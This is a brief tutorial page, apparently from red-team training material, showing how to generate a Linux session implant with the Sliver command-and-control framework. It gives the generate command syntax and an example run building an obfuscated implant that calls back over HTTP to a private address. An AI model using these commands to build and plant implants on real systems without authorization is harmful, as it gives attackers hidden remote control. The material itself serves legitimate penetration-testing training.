Skip to main content

Linux Implants

Generate a Linux Session Implant

To generate an implant for Linux use the following command structure. This will create a session mode implant.

generate --name <implant-name> --os linux --http <server-ipaddress>

For example:

sliver > generate --name linsession --os linux --http 192.168.0.120

[*] Generating new linux/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
[*] Implant saved to /home/rto/linsession